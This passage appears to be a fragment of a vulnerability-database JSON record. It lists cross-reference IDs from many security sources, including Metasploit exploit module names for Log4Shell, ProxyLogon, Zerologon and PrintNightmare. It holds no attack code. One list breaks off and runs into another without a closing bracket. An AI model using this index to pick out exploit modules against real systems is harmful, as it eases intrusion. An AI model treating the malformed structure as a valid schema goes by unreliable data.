"FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-133A", "AA20-182A", "AA20-183A", "AA20-195A", "AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-200B", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-321A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", "AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-131A", "AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-040A", "AA23-059A", "AA23-061A", 
"AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A", "AA23-158A", "AA23-165A", "AA23-187A", "AA23-193A", "AA23-201A", "AA23-208A", "AA23-213A", "AA23-215A", "AA23-242A", "AA23-250A", "AA23-263A", "ICSA-18-107-04", "ICSA-18-107-05", "ICSA-21-077-03", "ICSA-21-119-03", "ICSA-21-133-02", "ICSA-21-147-02", "ICSA-21-245-01", "ICSA-21-334-04", "ICSA-21-357-02", "ICSA-22-034-01", "ICSA-22-256-01", "ICSMA-18-058-02"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506", "IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:937EDF98C40EFDDA392CC06661F152F0", "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:D1F1D344B2FD670184AA4FB99A50BD1B", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96", "IMPERVABLOG:E3068E5C16504E4E7591776B5E79213F"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA10995", "KLA11024", "KLA11059", "KLA11139", "KLA11664", "KLA11835", "KLA11929", "KLA11931", "KLA12103", "KLA12169", "KLA12198", "KLA12202", "KLA12213", "KLA12214", "KLA12224", "KLA12277", "KLA12278", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:1680589374755422772", "KITPLOIT:232707789076746523", "KITPLOIT:3697667464193804316", 
"KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864", "KITPLOIT:5104415481503400470", "KITPLOIT:6049290411707454748", "KITPLOIT:6411625084720414057", "KITPLOIT:648469287269586263", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:866017936175971203", "KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:69ADDAD13D83673CDE629B3AD655DD29", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "mageia", "idList": ["MGASA-2020-0380", "MGASA-2021-0056", "MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2023-0141"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:3A629D0DB6CE0BFDB2462C4612ED19ED", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", 
"MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-LINUX-HTTP-SONICWALL_CVE_2021_20039-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_VSAN_HEALTH_RCE-", "MSF:EXPLOIT-LINUX-LOCAL-SUDO_BARON_SAMEDIT-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", 
"MSF:EXPLOIT-MULTI-HTTP-CVE_2021_35464_FORGEROCK_OPENAM-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_SERVICEDESK_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ENDPOINT_CENTRAL_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-"]}, {"type": "mmpc", "idList": ["MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2DF3FD324C56807B3618640F5C3492C7", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:4C62BE50213C7726C383DAD096CBBB99", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:795E0A765679492C51FEFA2B19EAD597", "MMPC:A086D121065A6253A8EECABD51EB16DF", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:D3341B3E36680D5272BC91A3694352AC", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F36351D1B5A5C40989F46EF8729039A7", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0199", "MS:CVE-2017-11882", 
"MS:CVE-2020-0688", "MS:CVE-2020-1472", "MS:CVE-2021-1675", "MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078", "MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-31207", "MS:CVE-2021-33768", "MS:CVE-2021-34470", "MS:CVE-2021-34473", "MS:CVE-2021-34523", "MS:CVE-2021-34527", "MS:CVE-2021-40444", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB2553204", "KB3141529", "KB3141538", "KB3162047", "KB3178703", "KB3178710", "KB4011262", "KB4011276", "KB4011604", "KB4011618", "KB4014793", "KB4536987", "KB4536988", "KB4536989", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5000871", "KB5000978", "KB5001779", "KB5003435", "KB5004945", "KB5004946", "KB5004947", "KB5004948", "KB5004950", "KB5004951", "KB5004953", "KB5004954", "KB5004955", "KB5004956", "KB5004958", "KB5004959", "KB5004960", "KB5005563"]}, {"type": "msrc", "idList": ["MSRC:11EE27B79C8FC8176F733C5748E02C96", "MSRC:138C696A39E258DD773C8941F8F90E86", "MSRC:236F052536DCDE6A90F408B759E221BC", "MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:35A18F0B9DCC4126DC5EC19296034C33", "MSRC:543F3A129A47F4B14FB170389908717B", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "MSRC:617BB0BF7CDA5777BFA2E81C8277D73C", "MSRC:6EA997A78BB548DC0178952394874CE2", "MSRC:7A4C48432D99E285A3DCFB40C66B7041", "MSRC:8DDE6C6C2CBC080233B7C0F929E83062", "MSRC:8F98074A1D86F9B965ADC16597E286ED", "MSRC:90189138D61770FDBFA4D6BFCF043C7F", "MSRC:93A361B73FFA3EEFB6825C56F25103BB", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "MSRC:C6213215CC0BE4847F142F730607AFA2", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4", "MSRC:D3EB0B723121A9028F60C06787605F29", "MSRC:D7503EE6392B6B3DC42482FC0340DB67", 
"MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2DF3FD324C56807B3618640F5C3492C7", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:4C62BE50213C7726C383DAD096CBBB99", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:795E0A765679492C51FEFA2B19EAD597", "MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:A086D121065A6253A8EECABD51EB16DF", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:A60AFC5A5E991E303E0397289A086789", "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D3341B3E36680D5272BC91A3694352AC", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786816", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789425", "MYHACK58:62201889900", "MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516", "MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["ACCELLION_FTA_9_12_380.NASL", "AL2022_ALAS2022-2022-225.NASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1585.NASL", "AL2_ALAS-2021-1590.NASL", 
"AL2_ALAS-2021-1649.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1739.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1469.NASL", "ALA_ALAS-2021-1478.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2021-0218.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CENTOS8_RHSA-2021-0218.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "CENTOS_RHSA-2021-0221.NASL", "CHECKBOX_SURVEY_CVE-2021-27852.NASL", "CISCO-SA-20180328-SMI2-IOS.NASL", "CISCO-SA-20180328-SMI2-IOSXE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DLA-2463.NASL", "DEBIAN_DLA-2534.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-4839.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1173.NASL", "EULEROS_SA-2021-1257.NASL", "EULEROS_SA-2021-1276.NASL", "EULEROS_SA-2021-1366.NASL", "EULEROS_SA-2021-1375.NASL", "EULEROS_SA-2021-1390.NASL", "EULEROS_SA-2021-1424.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1520.NASL", 
"EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1575.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1630.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-1669.NASL", "EULEROS_SA-2021-1707.NASL", "EULEROS_SA-2021-2168.NASL", "EULEROS_SA-2021-2170.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FEDORA_2021-2CB63D912A.NASL", "FEDORA_2021-8840CBDCCD.NASL", "FORGEROCK_OPENAM_7_0.NASL", "FORTIGATE_FG-IR-22-398.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "FREEBSD_PKG_F3CF4B33601311EB9A0E206A8A720317.NASL", "GENTOO_GLSA-202012-24.NASL", "GENTOO_GLSA-202101-33.NASL", "GENTOO_GLSA-202209-02.NASL", "LINUX_CVE-2021-3156.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "MACOS_HT212177.NASL", "MACOS_SPLUNK_824.NASL", "MANAGEENGINE_ACCESS_MANAGER_PLUS_CVE-2022-47966.NBIN", "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "MANAGEENGINE_SERVICEDESK_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_MSP_13001_RCE.NASL", "MANAGEENGINE_SERVICEDESK_MSP_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_PLUS_14004.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "MS17-010.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0001_SUDO.NASL", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", 
"THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", 
"THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:500777B41EEA368E3AC2A6AED65C4A25", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:50745DFE98A2EA07C8BE5D2F2CFA940F", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5A8F52C1AE647553C21FA300983F3770", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", 
